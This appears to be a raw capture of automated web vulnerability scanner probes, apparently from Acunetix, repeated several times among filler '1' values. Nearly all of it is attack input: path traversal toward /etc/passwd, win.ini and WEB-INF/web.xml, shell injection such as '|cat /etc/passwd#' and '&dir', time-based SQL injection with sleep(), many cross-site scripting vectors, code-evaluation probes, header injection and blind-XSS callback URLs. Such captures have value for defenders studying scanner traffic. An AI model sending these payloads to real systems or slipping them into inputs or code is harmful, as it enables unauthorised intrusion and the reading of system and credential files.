\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1

1

cat /etc/passwd

................windowswin.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

${100033+99117}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&n964115=v978411

1

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

/etc/passwd

)

1

'

!(()&&!|*|*|

1

'"()

^(#$!@#$)(()))******

acu3814\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3814

1

"

WEB-INF/web.xml

1

1

1

acux6387\xc0\xbez1\xc0\xbcz2a\x90bcxuca6387

WEB-INF\web.xml

1

1<ScRiPt >prompt(907544)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

||cat /etc/passwd

1

'

1<script>prompt(970098)</script>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

"

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<ScRiPt >prompt(905561)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

'&dir&'

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924608></ScRiPt>

1

"&dir&"

1

1

acunetix_wvs_invalid_filename

-1)

1

1

1

|dir

1

1<ScRiPt >prompt(987147)</ScRiPt>

http://hithvVypnrtaX.bxss.me/

-1))

comments

1

1

file:///etc/passwd

1

6veZzZ5P'

1<video><source onerror="javascript:prompt(926021)">

1

1

1

'|dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999034)"></g></svg>

PI7mwPi2')

1

"|dir

1

1

comments/.

'"

1<div style=width:expression(prompt(961753))>

DPynLvCb'))

http://www.acunetix.tst

1

1

1

1'"()&%<ScRiPt >prompt(971084)</ScRiPt>

WEB-INF/web.xml

1

1

-1

<!--

1<iframe src='data:text/html

1

-1)

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(994676)</ScRiPt>

1

1

1

1<body onload=prompt(915695)>

1

-1))

1

1_968461

response.write(9073296*9160054)

../../../../../../../../../../windows/win.ini

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994296)>

1

'+response.write(9073296*9160054)+'

KCDwH9lo'

1

1

1

../../../../../../../../../../boot.ini

1<img src=xyz OnErRor=prompt(989398)>

&cat /etc/passwd&

F88oDpa1')

"+response.write(9073296*9160054)+"

1<img/src=">" onerror=alert(995936)>

1

7Txo5nSL'))

1

1

1

1<ScRiPt%20>prompt(981702)</sCripT>

../../../../../../../../../../windows/win.ini.jpg

'&cat /etc/passwd&'

1

1

1

1

1&lt

1

"&cat /etc/passwd&"

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

\xf6<img acu onmouseover=prompt(998723) //\xf6>

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<input autofocus onfocus=prompt(912777)>

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<a href='http://www.acunetix.com'>website security</a>

`cat /etc/passwd`

1

1

[url=http://www.acunetix.com]website security[/url]

1

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1_wxzSD <ScRiPt >prompt(944046)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1

1

1

1

1

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${99255+100470}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

1&n985422=v936795

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

"

1

acu5965\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5965

1

WEB-INF/web.xml

/etc/passwd

1

1

1

acux2765\xc0\xbez1\xc0\xbcz2a\x90bcxuca2765

||cat /etc/passwd

WEB-INF\web.xml

1

1<ScRiPt >prompt(962739)</ScRiPt>

)

1

1

1

!(()&&!|*|*|

&dir

1

1<script>prompt(954054)</script>

^(#$!@#$)(()))******

1

1

'&dir&'

'"()

1

1<ScRiPt >prompt(919533)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961619></ScRiPt>

1

1

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

|dir

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<ScRiPt >prompt(996899)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

'|dir

'

1<video><source onerror="javascript:prompt(996749)">

1

1

1

"|dir

"

-1)

acunetix_wvs_invalid_filename

1

1

1

http://hitIf3tXjI4qn.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942683)"></g></svg>

-1))

1

1

file:///etc/passwd

comments

x7u92e3n'

1

1

1<div style=width:expression(prompt(923006))>

1

${@print(md5(acunetix_wvs_security_test))}\

sShVm8Pi')

comments

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

BynyC4Ez'))

comments/.

1

1

1

1<body onload=prompt(924320)>

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988518)>

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

-1)

1

http://www.acunetix.tst

1

1<img src=xyz OnErRor=prompt(912590)>

1

-1))

1

1

'"

../../../../../../../../../../windows/win.ini

1<img/src=">" onerror=alert(925576)>

1'"()&%<ScRiPt >prompt(977198)</ScRiPt>

response.write(9508349*9184064)

TesjMtTW'

<!--

1

1

../../../../../../../../../../boot.ini

1

'+response.write(9508349*9184064)+'

'"()&%<ScRiPt >prompt(913057)</ScRiPt>

1<ScRiPt%20>prompt(936064)</sCripT>

1

1

1

FrxCtCy8')

"+response.write(9508349*9184064)+"

1

../../../../../../../../../../windows/win.ini.jpg

1&lt

1_977935

1

1

URndUMvm'))

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

&cat /etc/passwd&

\xf6<img acu onmouseover=prompt(947078) //\xf6>

1

1

1

1

................windowswin.ini

1

1<input autofocus onfocus=prompt(911149)>

'&cat /etc/passwd&'

1

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

[url=http://www.acunetix.com]website security[/url]

1

"&cat /etc/passwd&"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1_EW2Lc <ScRiPt >prompt(984462)</ScRiPt>

1

1

cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

1

1

1

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100209+100447}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

"|"ld

WEB-INF\web.xml

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1&n911503=v953838

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

acu10806\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10806

1

1

'

testasp.vulnweb.com

1

1

/etc/passwd

acux8417\xc0\xbez1\xc0\xbcz2a\x90bcxuca8417

1

1

"

1<ScRiPt >prompt(911088)</ScRiPt>

1

)

1

1

1<script>prompt(982059)</script>

'"()

!(()&&!|*|*|

1

||cat /etc/passwd

1

1<ScRiPt >prompt(962483)</ScRiPt>

1

^(#$!@#$)(()))******

1

&dir

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957702></ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

1

1

1<ScRiPt >prompt(926588)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<video><source onerror="javascript:prompt(926519)">

1

1

1

"&dir&"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hitIGS0LxaHTZ.bxss.me/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945929)"></g></svg>

|dir

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<div style=width:expression(prompt(951295))>

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

-1

'|dir

1

1

1

file:///etc/passwd

-1)

1

1<iframe src='data:text/html

comments

"|dir

1

1

-1))

1

comments

1

1<body onload=prompt(938459)>

1

1

zbDXiBTP'

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919398)>

1

UWv0Y3LP')

1

1<img src=xyz OnErRor=prompt(990310)>

1

1

1

1<img/src=">" onerror=alert(921110)>

WEB-INF/web.xml

1

1

gAUxkPzV'))

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1<ScRiPt%20>prompt(982220)</sCripT>

-1

'"

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(983528)</ScRiPt>

1

1

1&lt

-1)

<!--

response.write(9235074*9473998)

1

-1))

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(999644)</ScRiPt>

1

1

1

1

\xf6<img acu onmouseover=prompt(932262) //\xf6>

'+response.write(9235074*9473998)+'

tGdLeXsP'

1

1

../../../../../../../../../../boot.ini

1_950583

PigZ3xUX')

1

1

1

"+response.write(9235074*9473998)+"

1<input autofocus onfocus=prompt(910761)>

../../../../../../../../../../windows/win.ini.jpg

VidxR0wo'))

1

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

'&cat /etc/passwd&'

[url=http://www.acunetix.com]website security[/url]

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1_Kxixm <ScRiPt >prompt(996793)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

|cat /etc/passwd#

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

'|'ld

${99946+99237}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

1

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1&n904991=v964213

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

1

testasp.vulnweb.com

'

1

1

WEB-INF\web.xml

1

1

1

1

)

"

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

1

1

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

1

1

1

1

1

/etc/passwd

&dir

1

1

'"()

1

1

acu5823\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5823

'&dir&'

1

acux2197\xc0\xbez1\xc0\xbcz2a\x90bcxuca2197

1

'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<ScRiPt >prompt(953738)</ScRiPt>

1

"

1

1

"&dir&"

1<script>prompt(910526)</script>

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

comments

http://hit12nGb8VSuv.bxss.me/

|dir

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<ScRiPt >prompt(946614)</ScRiPt>

1

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902850></ScRiPt>

1

'|dir

1

1<ScRiPt >prompt(986748)</ScRiPt>

comments/.

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<video><source onerror="javascript:prompt(970895)">

1

1

"|dir

-1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933989)"></g></svg>

1

1

1

-1)

1

1

'"

http://www.acunetix.tst

1<div style=width:expression(prompt(951009))>

1

1

file:///etc/passwd

-1))

1

1

1

1

1<iframe src='data:text/html

<!--

fi74dfZa'

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(995380)</ScRiPt>

1

1

1

1

QlhEV8se')

1<body onload=prompt(933702)>

1

WEB-INF/web.xml

response.write(9025562*9068140)

1

'"()&%<ScRiPt >prompt(977404)</ScRiPt>

1

1

JbSsrfen'))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993073)>

1

'+response.write(9025562*9068140)+'

1_998736

WEB-INF\web.xml

1

&cat /etc/passwd&

"+response.write(9025562*9068140)+"

1<img src=xyz OnErRor=prompt(975506)>

-1

1

1

1

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini

-1)

1<img/src=">" onerror=alert(940097)>

1

1

"&cat /etc/passwd&"

1

-1))

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(986207)</sCripT>

1

../../../../../../../../../../boot.ini

1

XsyOVjz8'

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1&lt

K2vfPG7G')

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

../../../../../../../../../../windows/win.ini.jpg

\xf6<img acu onmouseover=prompt(909795) //\xf6>

elaGaAYa'))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1<input autofocus onfocus=prompt(926985)>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

|cat /etc/passwd#

1

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../etc/passwd.jpg

1

1

[url=http://www.acunetix.com]website security[/url]

'|'ld

1

1

................windowswin.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1_A3Fqu <ScRiPt >prompt(958654)</ScRiPt>

1

1

1

"|"ld

..\..\..\..\..\..\..\..\windows\win.ini

${99250+100189}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1

acu4482\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4482

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

acux4620\xc0\xbez1\xc0\xbcz2a\x90bcxuca4620

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

testasp.vulnweb.com

1

1<ScRiPt >prompt(900240)</ScRiPt>

1

1

1&n900860=v903213

||cat /etc/passwd

1<script>prompt(976736)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

/etc/passwd

1

1

&dir

1<ScRiPt >prompt(908008)</ScRiPt>

1

1

1

1

)

'&dir&'

!(()&&!|*|*|

WEB-INF/web.xml

1

^(#$!@#$)(()))******

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988749></ScRiPt>

"&dir&"

1

1<ScRiPt >prompt(998307)</ScRiPt>

1

WEB-INF\web.xml

'"()

1

|dir

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<video><source onerror="javascript:prompt(994485)">

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

'|dir

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996959)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

"|dir

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<div style=width:expression(prompt(902021))>

1

1

-1)

'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1

1<iframe src='data:text/html

1

1

acunetix_wvs_invalid_filename

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1

http://hitqBLncnm4iQ.bxss.me/

1<body onload=prompt(948856)>

comments

${@print(md5(acunetix_wvs_security_test))}\

1

qtiO4MCG'

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996697)>

1

1

RGNlAlgW')

comments

1

1

1

1<img src=xyz OnErRor=prompt(954681)>

1

1

Uk6AuJAy'))

http://www.acunetix.tst

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

1

-1

1

1

1<img/src=">" onerror=alert(929107)>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

-1)

1

WEB-INF/web.xml

'"

1

1

1

1

-1))

1

1'"()&%<ScRiPt >prompt(976195)</ScRiPt>

1

1<ScRiPt%20>prompt(953233)</sCripT>

<!--

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(932580)</ScRiPt>

response.write(9689048*9924525)

Dad77EWJ'

1

1

1&lt

1

1

1_900649

1

ZHq7fezj')

../../../../../../../../../../windows/win.ini

'+response.write(9689048*9924525)+'

\xf6<img acu onmouseover=prompt(939846) //\xf6>

1

1

1

wFEM9iCN'))

1

"+response.write(9689048*9924525)+"

&cat /etc/passwd&

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(939952)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

<a href='http://www.acunetix.com'>website security</a>

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"&cat /etc/passwd&"

1

1_dkEv0 <ScRiPt >prompt(915322)</ScRiPt>

1

1

1

1

................windowswin.ini

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

${100121+100381}

|cat /etc/passwd#

1

../../../../../../../../../../etc/passwd.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'|'ld

1&n940985=v995944

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

1

)

WEB-INF\web.xml

'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

"

acu1883\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1883

^(#$!@#$)(()))******

1

1

1

acux3474\xc0\xbez1\xc0\xbcz2a\x90bcxuca3474

/etc/passwd

1

1

1

||cat /etc/passwd

1<ScRiPt >prompt(961150)</ScRiPt>

1

1

1

1

&dir

1<script>prompt(953596)</script>

'"()

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1<ScRiPt >prompt(972012)</ScRiPt>

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906594></ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

${@print(md5(acunetix_wvs_security_test))}\

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hit4626L2txXL.bxss.me/

acunetix_wvs_invalid_filename

1

1<ScRiPt >prompt(923312)</ScRiPt>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

|dir

1

-1

comments

1

1

1

1<video><source onerror="javascript:prompt(911422)">

1

-1)

comments

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963646)"></g></svg>

1

1

1

'|dir

-1))

comments/.

1

1

1

1<div style=width:expression(prompt(966956))>

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"|dir

DepKtDPg'

1

1<iframe src='data:text/html

1

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

Jtk5KUsk')

1

1<body onload=prompt(977733)>

1

1

'"

1

d7QEYvKB'))

WEB-INF/web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985450)>

1

1

<!--

1

1

WEB-INF\web.xml

1

1

-1

1<img src=xyz OnErRor=prompt(947906)>

1

1

1

1

../../../../../../../../../../windows/win.ini

1'"()&%<ScRiPt >prompt(954668)</ScRiPt>

-1)

1

1<img/src=">" onerror=alert(907952)>

1

response.write(9666622*9544392)

1

../../../../../../../../../../boot.ini

1

'"()&%<ScRiPt >prompt(937054)</ScRiPt>

1<ScRiPt%20>prompt(964678)</sCripT>

-1))

'+response.write(9666622*9544392)+'

1

1

&cat /etc/passwd&

1&lt

1_986359

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

QGVKMTOA'

1

"+response.write(9666622*9544392)+"

'&cat /etc/passwd&'

1

\xf6<img acu onmouseover=prompt(951586) //\xf6>

